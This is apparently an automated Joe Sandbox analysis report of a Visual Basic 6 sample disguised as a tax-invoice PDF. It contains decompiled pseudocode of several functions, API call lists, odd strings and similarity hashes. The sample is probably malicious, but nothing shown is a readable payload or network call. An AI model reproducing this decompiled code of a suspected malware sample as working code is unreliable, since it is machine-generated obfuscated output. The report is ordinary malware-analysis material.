				_t71 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4014b6, _t110);
				_t95 =  &_v28;
				L00401684();
				L004015DC();
				L004015E2();
				asm("fcomp qword [0x401258]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_push(_t95);
					 *_t113 =  *0x401250;
					_t126 =  *0x401248 *  *0x4011d8;
					if( *0x41a000 != 0) {
						_push( *0x4011d4);
						_push( *0x4011d0);
						L004014D4();
					} else {
						_t126 = _t126 /  *0x4011d0;
					}
					_v92 = _t126;
					_v56 = _v92;
					 *_t113 =  *0x401240;
					L00401612();
					 *_t113 =  *0x401230;
					_v72 =  *0x40122c;
					_v76 =  *0x401228;
					_t93 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t95, _t95, _t95, _t71, _t95, _t95);
					asm("fclex");
					_v76 = _t93;
					if(_v76 >= 0) {
						_t19 =  &_v96;
						 *_t19 = _v96 & 0x00000000;
						__eflags =  *_t19;
					} else {
						_push(0x2c0);
						_push(0x411138);
						_push(_a4);
						_push(_v76);
						L00401690();
						_v96 = _t93;
					}
				}
				if( *0x41a010 != 0) {
					_v100 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v100 = 0x41a010;
				}
				_t75 =  &_v36;
				L0040169C();
				_v76 = _t75;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t79 =  *((intOrPtr*)( *_v76 + 0x1ec))(_v76, L"Spherulitize", 0x10, _t75,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x32c))( *_v100));
				asm("fclex");
				_v80 = _t79;
				if(_v80 >= 0) {
					_t39 =  &_v104;
					 *_t39 = _v104 & 0x00000000;
					__eflags =  *_t39;
				} else {
					_push(0x1ec);
					_push(0x4117fc);
					_push(_v76);
					_push(_v80);
					L00401690();
					_v104 = _t79;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v108 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v108 = 0x41a010;
				}
				_t83 =  &_v36;
				L0040169C();
				_v76 = _t83;
				_t87 =  *((intOrPtr*)( *_v76 + 0x160))(_v76,  &_v40, _t83,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x314))( *_v108));
				asm("fclex");
				_v80 = _t87;
				if(_v80 >= 0) {
					_t58 =  &_v112;
					 *_t58 = _v112 & 0x00000000;
					__eflags =  *_t58;
				} else {
					_push(0x160);
					_push(0x4117d8);
					_push(_v76);
					_push(_v80);
					L00401690();
					_v112 = _t87;
				}
				_push(0);
				_push(0);
				_push(_v40);
				_t88 =  &_v56;
				_push(_t88);
				L00401618();
				_push(_t88);
				L0040160C();
				_v32 = _t88;
				_push( &_v40);
				_t90 =  &_v36;
				_push(_t90);
				_push(2);
				L00401654();
				L00401636();
				asm("wait");
				_push(0x415231);
				L0040165A();
				return _t90;
			}

0x00414f88
0x00414f97
0x00414fa1
0x00414fa9
0x00414fac
0x00414fb3
0x00414fc2
0x00414fc8
0x00414fcb
0x00414fd6
0x00414fdb
0x00414fe0
0x00414fe6
0x00414fe8
0x00414fe9
0x00414ff5
0x00414ff6
0x00414fff
0x0041500c
0x00415016
0x0041501c
0x00415022
0x0041500e
0x0041500e
0x0041500e
0x00415027
0x0041502e
0x00415038
0x00415041
0x0041504e
0x00415058
0x00415062
0x00415072
0x00415078
0x0041507a
0x00415081
0x0041509d
0x0041509d
0x0041509d
0x00415083
0x00415083
0x00415088
0x0041508d
0x00415090
0x00415093
0x00415098
0x00415098
0x00415081
0x004150a8
0x004150c2
0x004150aa
0x004150aa
0x004150af
0x004150b4
0x004150b9
0x004150b9
0x004150dd
0x004150e1
0x004150e6
0x004150e9
0x004150f0
0x004150fa
0x00415104
0x00415105
0x00415106
0x00415107
0x00415115
0x0041511b
0x0041511d
0x00415124
0x00415140
0x00415140
0x00415140
0x00415126
0x00415126
0x0041512b
0x00415130
0x00415133
0x00415136
0x0041513b
0x0041513b
0x00415147
0x00415153
0x0041516d
0x00415155
0x00415155
0x0041515a
0x0041515f
0x00415164
0x00415164
0x00415188
0x0041518c
0x00415191
0x004151a0
0x004151a6
0x004151a8
0x004151af
0x004151cb
0x004151cb
0x004151cb
0x004151b1
0x004151b1
0x004151b6
0x004151bb
0x004151be
0x004151c1
0x004151c6
0x004151c6
0x004151cf
0x004151d1
0x004151d3
0x004151d6
0x004151d9
0x004151da
0x004151e2
0x004151e3
0x004151e8
0x004151ee
0x004151ef
0x004151f2
0x004151f3
0x004151f5
0x00415200
0x00415205
0x00415206
0x0041522b
0x00415230

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00414FA1
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00414FCB
__vbaFPInt.MSVBVM60(?,?,?,?,004014B6), ref: 00414FD6
__vbaFpR8.MSVBVM60(?,?,?,?,004014B6), ref: 00414FDB
_adj_fdiv_m64.MSVBVM60(?,?,?,?,?,004014B6), ref: 00415022
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,004014B6), ref: 00415041
__vbaHresultCheckObj.MSVBVM60(00000000,00401268,00411138,000002C0), ref: 00415093
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004150B4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004150E1
__vbaChkstk.MSVBVM60(?,00000000), ref: 004150FA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 00415136
__vbaFreeObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 00415147
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 0041515F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041518C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,00000160), ref: 004151C1
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004151DA
__vbaI4Var.MSVBVM60(00000000,?,?,?,004014B6), ref: 004151E3
__vbaFreeObjList.MSVBVM60(00000002,00000000,?,00000000,?,?,?,004014B6), ref: 004151F5
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,004014B6), ref: 00415200
__vbaFreeStr.MSVBVM60(00415231,?,?,00000000,?,?,?,004014B6), ref: 0041522B

Strings

Spherulitize, xrefs: 00415108

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$CallCopyLateList_adj_fdiv_m64
String ID: Spherulitize
API String ID: 506408821-3937725628
Opcode ID: 3e68b0cefb0fbf27ba59729d564f8f3f2d483a2e721032b626318248af546ffa
Instruction ID: 5df164bf2149bfba0691b3c4f0163386019953f717d6a63e5ecb4ba92f560cc8
Opcode Fuzzy Hash: 3e68b0cefb0fbf27ba59729d564f8f3f2d483a2e721032b626318248af546ffa
Instruction Fuzzy Hash: EC710270900608EFCB01EFA1DD49BEDBBB8BF08304F14486AF145BB2A0C7799991DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00416C38, Relevance: 34.7, APIs: 23, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00416C38(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				void* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				char* _t107;
				signed int _t110;
				signed int _t120;
				signed int _t125;
				signed int _t126;
				signed int _t132;
				signed int _t137;
				void* _t158;
				void* _t160;
				intOrPtr _t161;

				_t161 = _t160 - 0xc;
				 *[fs:0x0] = _t161;
				L004014B0();
				_v16 = _t161;
				_v12 = 0x401348;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x4014b6, _t158);
				L00401684();
				if( *0x41a010 != 0) {
					_v88 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v88 = 0x41a010;
				}
				_t107 =  &_v40;
				L0040169C();
				_v60 = _t107;
				_t110 =  *((intOrPtr*)( *_v60 + 0x1d8))(_v60, _t107,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x2fc))( *_v88));
				asm("fclex");
				_v64 = _t110;
				if(_v64 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x411730);
					_push(_v60);
					_push(_v64);
					L00401690();
					_v92 = _t110;
				}
				L0040168A();
				_push(0x411a04);
				L00401594();
				_push(_t110);
				L0040159A();
				L00401648();
				_push(_t110);
				_push(0x411830);
				L0040164E();
				asm("sbb eax, eax");
				_v60 =  ~( ~( ~_t110));
				L0040165A();
				if(_v60 != 0) {
					if( *0x41a31c != 0) {
						_v96 = 0x41a31c;
					} else {
						_push(0x41a31c);
						_push(0x411788);
						L00401696();
						_v96 = 0x41a31c;
					}
					_v60 =  *_v96;
					_t132 =  *((intOrPtr*)( *_v60 + 0x4c))(_v60,  &_v40);
					asm("fclex");
					_v64 = _t132;
					if(_v64 >= 0) {
						_v100 = _v100 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x411778);
						_push(_v60);
						_push(_v64);
						L00401690();
						_v100 = _t132;
					}
					_v68 = _v40;
					_v48 = 1;
					_v56 = 2;
					L004014B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t137 =  *((intOrPtr*)( *_v68 + 0x2c))(_v68, 0x10);
					asm("fclex");
					_v72 = _t137;
					if(_v72 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x2c);
						_push(0x411980);
						_push(_v68);
						_push(_v72);
						L00401690();
						_v104 = _t137;
					}
					L0040168A();
				}
				if( *0x41a31c != 0) {
					_v108 = 0x41a31c;
				} else {
					_push(0x41a31c);
					_push(0x411788);
					L00401696();
					_v108 = 0x41a31c;
				}
				_v60 =  *_v108;
				_t120 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t120;
				if(_v64 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411778);
					_push(_v60);
					_push(_v64);
					L00401690();
					_v112 = _t120;
				}
				_v68 = _v40;
				_t125 =  *((intOrPtr*)( *_v68 + 0xd8))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t125;
				if(_v72 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x411900);
					_push(_v68);
					_push(_v72);
					L00401690();
					_v116 = _t125;
				}
				_t126 = _v36;
				_v84 = _t126;
				_v36 = _v36 & 0x00000000;
				L00401648();
				L0040168A();
				_push(0x416efe);
				L0040165A();
				L0040165A();
				return _t126;
			}

0x00416c3b
0x00416c4a
0x00416c54
0x00416c5c
0x00416c5f
0x00416c66
0x00416c75
0x00416c7e
0x00416c8a
0x00416ca4
0x00416c8c
0x00416c8c
0x00416c91
0x00416c96
0x00416c9b
0x00416c9b
0x00416cbf
0x00416cc3
0x00416cc8
0x00416cd3
0x00416cd9
0x00416cdb
0x00416ce2
0x00416cfe
0x00416ce4
0x00416ce4
0x00416ce9
0x00416cee
0x00416cf1
0x00416cf4
0x00416cf9
0x00416cf9
0x00416d05
0x00416d0a
0x00416d0f
0x00416d14
0x00416d15
0x00416d1f
0x00416d24
0x00416d25
0x00416d2a
0x00416d31
0x00416d37
0x00416d3e
0x00416d49
0x00416d56
0x00416d70
0x00416d58
0x00416d58
0x00416d5d
0x00416d62
0x00416d67
0x00416d67
0x00416d7c
0x00416d8b
0x00416d8e
0x00416d90
0x00416d97
0x00416db0
0x00416d99
0x00416d99
0x00416d9b
0x00416da0
0x00416da3
0x00416da6
0x00416dab
0x00416dab
0x00416db7
0x00416dba
0x00416dc1
0x00416dcb
0x00416dd5
0x00416dd6
0x00416dd7
0x00416dd8
0x00416de1
0x00416de4
0x00416de6
0x00416ded
0x00416e06
0x00416def
0x00416def
0x00416df1
0x00416df6
0x00416df9
0x00416dfc
0x00416e01
0x00416e01
0x00416e0d
0x00416e0d
0x00416e19
0x00416e33
0x00416e1b
0x00416e1b
0x00416e20
0x00416e25
0x00416e2a
0x00416e2a
0x00416e3f
0x00416e4e
0x00416e51
0x00416e53
0x00416e5a
0x00416e73
0x00416e5c
0x00416e5c
0x00416e5e
0x00416e63
0x00416e66
0x00416e69
0x00416e6e
0x00416e6e
0x00416e7a
0x00416e89
0x00416e8f
0x00416e91
0x00416e98
0x00416eb4
0x00416e9a
0x00416e9a
0x00416e9f
0x00416ea4
0x00416ea7
0x00416eaa
0x00416eaf
0x00416eaf
0x00416eb8
0x00416ebb
0x00416ebe
0x00416ec8
0x00416ed0
0x00416ed5
0x00416ef0
0x00416ef8
0x00416efd

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00416C54
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00416C7E
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00416C96
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416CC3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411730,000001D8), ref: 00416CF4
__vbaFreeObj.MSVBVM60(00000000,?,00411730,000001D8), ref: 00416D05
__vbaI4Str.MSVBVM60(00411A04), ref: 00416D0F
#537.MSVBVM60(00000000,00411A04), ref: 00416D15
__vbaStrMove.MSVBVM60(00000000,00411A04), ref: 00416D1F
__vbaStrCmp.MSVBVM60(00411830,00000000,00000000,00411A04), ref: 00416D2A
__vbaFreeStr.MSVBVM60(00411830,00000000,00000000,00411A04), ref: 00416D3E
__vbaNew2.MSVBVM60(00411788,0041A31C,00411830,00000000,00000000,00411A04), ref: 00416D62
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,0000004C), ref: 00416DA6
__vbaChkstk.MSVBVM60(00000000,?,00411778,0000004C), ref: 00416DCB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411980,0000002C), ref: 00416DFC
__vbaFreeObj.MSVBVM60(00000000,?,00411980,0000002C), ref: 00416E0D
__vbaNew2.MSVBVM60(00411788,0041A31C,00411830,00000000,00000000,00411A04), ref: 00416E25
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000014), ref: 00416E69
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411900,000000D8), ref: 00416EAA
__vbaStrMove.MSVBVM60(00000000,?,00411900,000000D8), ref: 00416EC8
__vbaFreeObj.MSVBVM60(00000000,?,00411900,000000D8), ref: 00416ED0
__vbaFreeStr.MSVBVM60(00416EFE), ref: 00416EF0
__vbaFreeStr.MSVBVM60(00416EFE), ref: 00416EF8

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2$ChkstkMove$#537Copy
String ID:
API String ID: 1605330434-0
Opcode ID: 83fd1c275c3397bfadbab0be8345670a929eadbc5821d295fc3a5b3b69c40409
Instruction ID: 93ff820bb498499a864affc5a66e561b71f177fe634dc98a242eff27355b1289
Opcode Fuzzy Hash: 83fd1c275c3397bfadbab0be8345670a929eadbc5821d295fc3a5b3b69c40409
Instruction Fuzzy Hash: 9981C274900208EFCB00EFA5D949BEDBBB4AF18305F20452AF401BB2A1DB799995DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004164DA, Relevance: 34.7, APIs: 23, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E004164DA(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				void* _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				char* _t81;
				signed int _t84;
				char* _t88;
				signed int _t91;
				char* _t94;
				short _t98;
				char* _t106;
				signed int _t110;
				short _t111;
				intOrPtr _t134;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t134;
				_push(0x78);
				L004014B0();
				_v12 = _t134;
				_v8 = 0x401310;
				L00401684();
				if( *0x41a010 != 0) {
					_v120 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v120 = 0x41a010;
				}
				_t81 =  &_v36;
				L0040169C();
				_v108 = _t81;
				_t84 =  *((intOrPtr*)( *_v108 + 0x22c))(_v108, _t81,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x31c))( *_v120));
				asm("fclex");
				_v112 = _t84;
				if(_v112 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x22c);
					_push(0x4119b4);
					_push(_v108);
					_push(_v112);
					L00401690();
					_v124 = _t84;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v128 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v128 = 0x41a010;
				}
				_t88 =  &_v36;
				L0040169C();
				_v108 = _t88;
				_t91 =  *((intOrPtr*)( *_v108 + 0x1e8))(_v108, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x384))( *_v128));
				asm("fclex");
				_v112 = _t91;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x4117fc);
					_push(_v108);
					_push(_v112);
					L00401690();
					_v132 = _t91;
				}
				L0040168A();
				_push( &_v52);
				L0040167E();
				_push( &_v52);
				_t94 =  &_v32;
				_push(_t94);
				L004015B8();
				_push(_t94);
				_push( &_v68);
				L004015BE();
				_push( &_v84);
				L0040167E();
				_push( &_v68);
				_t98 =  &_v84;
				_push(_t98);
				L00401678();
				_v108 = _t98;
				L0040165A();
				_push( &_v84);
				_push( &_v68);
				_push( &_v52);
				_push(3);
				L00401666();
				if(_v108 != 0) {
					L004015B2();
				}
				if( *0x41a010 != 0) {
					_v136 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v136 = 0x41a010;
				}
				_t106 =  &_v36;
				L0040169C();
				_v108 = _t106;
				_t110 =  *((intOrPtr*)( *_v108 + 0x180))(_v108,  &_v104, _t106,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x38c))( *_v136));
				asm("fclex");
				_v112 = _t110;
				if(_v112 >= 0) {
					_v140 = _v140 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x4119c4);
					_push(_v108);
					_push(_v112);
					L00401690();
					_v140 = _t110;
				}
				_t111 = _v104;
				_v24 = _t111;
				L0040168A();
				_push(0x416765);
				L0040165A();
				return _t111;
			}

0x004164df
0x004164ea
0x004164eb
0x004164f2
0x004164f5
0x004164fd
0x00416500
0x0041650d
0x00416519
0x00416533
0x0041651b
0x0041651b
0x00416520
0x00416525
0x0041652a
0x0041652a
0x0041654e
0x00416552
0x00416557
0x00416562
0x00416568
0x0041656a
0x00416571
0x0041658d
0x00416573
0x00416573
0x00416578
0x0041657d
0x00416580
0x00416583
0x00416588
0x00416588
0x00416594
0x004165a0
0x004165ba
0x004165a2
0x004165a2
0x004165a7
0x004165ac
0x004165b1
0x004165b1
0x004165d5
0x004165d9
0x004165de
0x004165e9
0x004165ef
0x004165f1
0x004165f8
0x00416614
0x004165fa
0x004165fa
0x004165ff
0x00416604
0x00416607
0x0041660a
0x0041660f
0x0041660f
0x0041661b
0x00416623
0x00416624
0x0041662c
0x0041662d
0x00416630
0x00416631
0x00416636
0x0041663a
0x0041663b
0x00416643
0x00416644
0x0041664c
0x0041664d
0x00416650
0x00416651
0x00416656
0x0041665d
0x00416665
0x00416669
0x0041666d
0x0041666e
0x00416670
0x0041667e
0x00416680
0x00416680
0x0041668c
0x004166a9
0x0041668e
0x0041668e
0x00416693
0x00416698
0x0041669d
0x0041669d
0x004166cd
0x004166d1
0x004166d6
0x004166e5
0x004166eb
0x004166ed
0x004166f4
0x00416713
0x004166f6
0x004166f6
0x004166fb
0x00416700
0x00416703
0x00416706
0x0041670b
0x0041670b
0x0041671a
0x0041671e
0x00416725
0x0041672a
0x0041675f
0x00416764

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004164F5
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 0041650D
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00416525
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416552
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119B4,0000022C), ref: 00416583
__vbaFreeObj.MSVBVM60(00000000,?,004119B4,0000022C), ref: 00416594
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 004165AC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004165D9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001E8), ref: 0041660A
__vbaFreeObj.MSVBVM60(00000000,?,004117FC,000001E8), ref: 0041661B
#610.MSVBVM60(?), ref: 00416624
__vbaStrVarVal.MSVBVM60(?,?,?), ref: 00416631
#540.MSVBVM60(?,00000000,?,?,?), ref: 0041663B
#610.MSVBVM60(?,?,00000000,?,?,?), ref: 00416644
__vbaVarTstNe.MSVBVM60(?,?,?,?,00000000,?,?,?), ref: 00416651
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,?), ref: 0041665D
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00416670
__vbaEnd.MSVBVM60 ref: 00416680
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 00416698
__vbaObjSet.MSVBVM60(?,00000000), ref: 004166D1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119C4,00000180), ref: 00416706
__vbaFreeObj.MSVBVM60(00000000,?,004119C4,00000180), ref: 00416725
__vbaFreeStr.MSVBVM60(00416765), ref: 0041675F

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$#610$#540ChkstkCopyList
String ID:
API String ID: 3831833640-0
Opcode ID: d34c2f330d3f877ea25acb63cbe22694d023625c7f2f887448b2daee163625df
Instruction ID: 2bba9c7309a8d4aac45e7d636b6b38660942532e692936eb42f3c936f69f53ee
Opcode Fuzzy Hash: d34c2f330d3f877ea25acb63cbe22694d023625c7f2f887448b2daee163625df
Instruction Fuzzy Hash: 3771D871900208AFCB10EFE1CC49FEDBBB8BF08308F14456AE515AB2A1DB799584DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004157A1, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E004157A1(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _t86;
				signed int _t91;
				char* _t96;
				signed int _t100;
				char* _t104;
				signed int _t108;
				intOrPtr _t131;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				_push(0x50);
				L004014B0();
				_v12 = _t131;
				_v8 = 0x401298;
				L00401684();
				if( *0x41a31c != 0) {
					_v76 = 0x41a31c;
				} else {
					_push(0x41a31c);
					_push(0x411788);
					L00401696();
					_v76 = 0x41a31c;
				}
				_v56 =  *_v76;
				_t86 =  *((intOrPtr*)( *_v56 + 0x14))(_v56,  &_v32);
				asm("fclex");
				_v60 = _t86;
				if(_v60 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411778);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v80 = _t86;
				}
				_v64 = _v32;
				_t91 =  *((intOrPtr*)( *_v64 + 0x108))(_v64,  &_v52);
				asm("fclex");
				_v68 = _t91;
				if(_v68 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x411900);
					_push(_v64);
					_push(_v68);
					L00401690();
					_v84 = _t91;
				}
				_v28 = _v52;
				L0040168A();
				if( *0x41a010 != 0) {
					_v88 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v88 = 0x41a010;
				}
				_t96 =  &_v32;
				L0040169C();
				_v56 = _t96;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t100 =  *((intOrPtr*)( *_v56 + 0x1ec))(_v56, L"Behovsanalysens", 0x10, _t96,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x384))( *_v88));
				asm("fclex");
				_v60 = _t100;
				if(_v60 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4117fc);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v92 = _t100;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v96 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v96 = 0x41a010;
				}
				_t104 =  &_v32;
				L0040169C();
				_v56 = _t104;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t108 =  *((intOrPtr*)( *_v56 + 0x1ec))(_v56, L"OSCINIDAE", 0x10, _t104,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x370))( *_v96));
				asm("fclex");
				_v60 = _t108;
				if(_v60 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4118a4);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v100 = _t108;
				}
				L0040168A();
				_push(0x4159fe);
				L0040165A();
				return _t108;
			}

0x004157a6
0x004157b1
0x004157b2
0x004157b9
0x004157bc
0x004157c4
0x004157c7
0x004157d4
0x004157e0
0x004157fa
0x004157e2
0x004157e2
0x004157e7
0x004157ec
0x004157f1
0x004157f1
0x00415806
0x00415815
0x00415818
0x0041581a
0x00415821
0x0041583a
0x00415823
0x00415823
0x00415825
0x0041582a
0x0041582d
0x00415830
0x00415835
0x00415835
0x00415841
0x00415850
0x00415856
0x00415858
0x0041585f
0x0041587b
0x00415861
0x00415861
0x00415866
0x0041586b
0x0041586e
0x00415871
0x00415876
0x00415876
0x00415883
0x0041588a
0x00415896
0x004158b0
0x00415898
0x00415898
0x0041589d
0x004158a2
0x004158a7
0x004158a7
0x004158cb
0x004158cf
0x004158d4
0x004158d7
0x004158de
0x004158e8
0x004158f2
0x004158f3
0x004158f4
0x004158f5
0x00415903
0x00415909
0x0041590b
0x00415912
0x0041592e
0x00415914
0x00415914
0x00415919
0x0041591e
0x00415921
0x00415924
0x00415929
0x00415929
0x00415935
0x00415941
0x0041595b
0x00415943
0x00415943
0x00415948
0x0041594d
0x00415952
0x00415952
0x00415976
0x0041597a
0x0041597f
0x00415982
0x00415989
0x00415993
0x0041599d
0x0041599e
0x0041599f
0x004159a0
0x004159ae
0x004159b4
0x004159b6
0x004159bd
0x004159d9
0x004159bf
0x004159bf
0x004159c4
0x004159c9
0x004159cc
0x004159cf
0x004159d4
0x004159d4
0x004159e0
0x004159e5
0x004159f8
0x004159fd

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004157BC
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004157D4
__vbaNew2.MSVBVM60(00411788,0041A31C,?,?,?,?,004014B6), ref: 004157EC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000014), ref: 00415830
